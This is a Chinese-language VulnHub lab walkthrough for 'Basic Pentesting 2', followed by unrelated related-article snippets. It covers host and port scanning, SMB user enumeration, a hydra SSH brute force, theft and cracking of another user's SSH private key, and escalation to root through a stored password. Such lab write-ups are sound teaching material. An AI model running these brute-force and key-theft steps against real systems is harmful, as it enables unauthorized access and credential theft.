Basic Pentesting:2-打靶渗透【附代码】(权限提升)

news2024/12/31 6:28:34

靶机下载地址:

https://www.vulnhub.com/entry/basic-pentesting-2,241/icon-default.png?t=N7T8https://www.vulnhub.com/entry/basic-pentesting-2,241/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:1D:4A:27'

1.2. 端口扫描

nmap -p- 192.168.7.88

1.3. 目录扫描

dirb http://192.168.7.88

1.4. 敏感信息收集

whatweb http://192.168.7.88

2. WEB打点寻找漏洞点

2.1. 进入80端口

无有用信息

2.2. 拼接扫描到的目录

拼接/development

存在两个文件,逐个点开看看

dev.txt:

j.txt:

信息总结:
提了SMB版本以及配置完成的信息 -》正好开放了445端口,等等可以试试看
K用户回复J用户 -》
1.说他一直在审核 /etc/shadow 的内容
2.K说J存在着弱密码问题

2.3. 445端口

利用kali的enum4linux工具枚举SMB服务中的信息;

enum4linux -a -o 192.168.7.88 

成功的排列出两个用户名信息,也符合上述中交流的J和K;

kay
jan

2.4. Getshell

我们已知账户名,而且又知道J用户存在弱密码问题,那就利用kali的九头蛇爆破试试咯

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.7.88 -t 64 
# 得知密码为
# armando

3. 权限提升

3.1. 连接ssh

1.连接ssh

ssh jan@192.168.7.88

2.老规矩,查看是否存在特权命令,或是否存在具有root\all权限的可利用的可执行文件,没有利用点

suod -l

3.逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件,但无访问权限;

但是可以访问kay用户的ssh私钥文件

cd .ssh
ls -al
cat id_rsa

3.复制私钥至本地,赋予执行权限【注意格式问题】

chmod +x 1.txt

4.通过python转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。

python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

获得密钥:beeswax

5.尝试登录ssh -> 成功

ssh -i 1 kay@192.168.7.88

3.2. 尝试提权

1.老规矩,查看是否存在特权命令,密码不大行,看看文件吧

sudo -l

2.有一个pass.bak文件,查看一下

cat pass.bak
# 有一段代码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

这个可能是kay用户的密码,尝试使用命令sudo -l输入密码成功 -> 权限是all,直接提权 ->成功

sudo su

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1995873.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MongoDB学习记录

1、初识Mongo 概述:与关系型数据库不同,MongoDB 的数据以类似于 JSON 格式的二进制文档存储,通常称这种格式为Bson,Bson不仅支持JSON中已有的数据类型,还增加了一些额外的数据类型,例如日期和二进制数据&a…

第二十三天培训笔记

上午 在同步时,对删除和修改都比较慎重(监控同步时) mysql 主从搭建 前提软件 libaio , rsync 注意:先执行从服务器的脚本,再执行主服务器脚本 master-mysql 配置脚本 2 、其他常⽤函数 ( …

【ML】pre-train model 是什么如何微调它,如何预训练

【ML】pre-train model 是什么如何微调它,如何预训练 0. 预训练模型(Pre-trained Model)0.1 预训练模型的预训练过程0.2 如何微调预训练模型0.3 总结 1. Contextualized word Embedding2. 怎么 让 bert 模型变小3. 如何微调模型 0. 预训练模型…

# 利刃出鞘_Tomcat 核心原理解析(三)

利刃出鞘_Tomcat 核心原理解析(三) 一、 Tomcat专题 - Tomcat架构 - 启动流程 1、Tomcat 启动流程 2、Tomcat 启动 步骤 : 1) 启动tomcat , 需要调用 bin/startup.bat (在linux 目录下 , 需要调用 bin/startup.sh) &#xff0c…

推荐学计算机的好用的软件

翻译软件 网易有道翻译 在敲代码时会遇见一些报错,这些报错提示都是以英文方式呈现的,这时候英语不好的就可以进行截图翻译了。快捷键:Ctrl Alt D 它可以进行语言的选择 不仅可以语言之间的转换,还有一些其他的功能&#xff0c…

用AI生成海报设计!AI绘画大模型Flux的在线使用!

​ 前言/海报生成 除了这种高质量的人像图片生成, ​ ​这个刚开源的flux AI绘画大模型也能用来直接生成这种动画海报,其实这个就是基于它优质的语义理解能力以及文本生成能力。 那我们来操作一下, flux需要本地部署并且在comfyUI使用&…

【Linux】基础IO认知

文件 1、回顾C语言中的文件接口2、对文件的理解(阶段一)3、文件操作3、1、C的文件操作接口3、2、认识系统调用接口3、2、强化对fd文件描述符及周边知识的理解 1、回顾C语言中的文件接口 事实上,我们在C语言的学习中了解的文件并不是真正的文件。从语言角度来说&…

在MLU370运行CogVideoX-2b轻轻松松!

文章目录 一、paas平台环境配置二、模型下载三、环境下载1.pip 正常安装2.diffusers安装 四、代码准备五、运行效果演示 一、paas平台环境配置 驱动版本选择:大于或等于5.10.29 显卡选择:MLU370系列 卡数:1-8卡【推荐2卡起步】 镜像选择&…

【层归一化用于单个样本适合于序列建模,通俗】

层归一化(Layer Normalization),简称 LayerNorm,会将神经网络层的激活值规范到均值为0,并将其方差归一化为1。尤其是在循环神经网络(RNNs)和自注意力模型(如 Transformers&#xff0…

加强混合工作时代的组织网络安全态势

随着组织转向采用和实施混合和远程工作模式,网络安全的重要性从未如此重要。虽然工作场所的这种演变提供了灵活性并有望提高生产力,但它也带来了组织无法忽视的无数网络安全挑战。多样化工作环境的整合需要强大的安全措施、创新的保护策略和警惕的文化&a…

信息学奥赛初赛天天练-60-NOIP2018普及组-基础题4-逻辑推理、分类归纳、找规律

PDF文档公众号回复关键字:20240809 NOIP2018 基础题4 1 甲乙丙丁四人在考虑周末要不要外出郊游 已知①如果周末下雨,并且乙不去,则甲一定不去;②如果乙去,则丁一定去;③如果丙去,则丁一定不去&#xff1b…

TLS 证书有效期缩短预计将使管理工作复杂化

76% 的安全领导者认识到迫切需要缩短证书有效期来提高安全性。然而,许多人觉得自己还没有准备好采取行动,77% 的人表示,改为使用 90 天证书将意味着不可避免地会出现更多中断。 谷歌计划缩短 TLS 证书有效期 81% 的安全主管认为&#xff0c…

性能分析的思想和方法

性能分析的思想和方法 作为新手,经历了性能测试需求分析、性能测试计划、性能测试压测工具/脚本等前置的一系列准备后,到了实施环节,支棱起来压测后,怎么判断有没有问题呢? 本文主要讲一下性能分析思想的几种方法,让大家知道在压测过程中发现了问题后如何去分析问题。…

Cmseasy_5.5的SQL注入

未授权访问进入后台获取Cookie安全码 在cmseasy目录下的lib/admin/admin.php中有这么一句代码,可以让我们实现未授权访问进入到cmseasy的后台获取Cookie安全码,为我们后期的注入做准备。 if($servipfront::ip()&&front::get(ishtml)1) return; …

python连接MySQL数据库使用pymysql

开头 经过这么一段时间的学生信息管理系统的摸爬滚打,不断的学习更新的知识,不断修改自己的认知,针对pymysql以及MySQL数据库的知识做个总结,以纪念我这段时间的学习。 目录 开头 pymysql的使用流程 1.导入pymysql的工具包 方…

TB6612FNG电机驱动连线图

TB6612FNG电机驱动连线图 原理图: 实物对应图: 面包板连线图:

多线程更新最大值

背景 有一张图像,很大,假设10000x10000,需要找其中的最大值和最小值,可以使用opencv的cv::minMaxLoc,但是对于这样的大图来说太慢了。可以多线程并行找。 方法 参考:How to atomically update a maximum…

【practise】电话号码的字母组合

关于我: 睡觉待开机:个人主页 个人专栏: 《优选算法》《C语言》《CPP》 生活的理想,就是为了理想的生活! 作者留言 PDF版免费提供:倘若有需要,想拿我写的博客进行学习和交流,可以私信我将免费提供PDF版。…

【秋招突围】2024届校招-米哈游笔试题-第二套

🍭 大家好这里是 春秋招笔试突围,一起备战大厂笔试 💻 ACM金牌团队🏅️ | 多次AK大厂笔试 | 编程一对一辅导 ✨ 本系列打算持续跟新 春秋招笔试题 👏 感谢大家的订阅➕ 和 喜欢💗 和 手里的小花花🌸 ✨ 笔试合集传送们 -> 🧷春秋招笔试合集 🌰 明晚又有米…

Ubuntu安装MySQL5.7 + Apache + PHP + 禅道 保姆及教程

目录 开始安装MySQL 5.7 1、获取安装包 2、解压到指定位置 安装MySQL 启动MySQL 进入到MySQL进行测试 设置允许所有IP可以连接 配置允许远程连接 和 开启 gtid 和 binlog 日志(这一步如果不需要可以不操作 如果只需要配置允许远程连接只添加bind-address 0…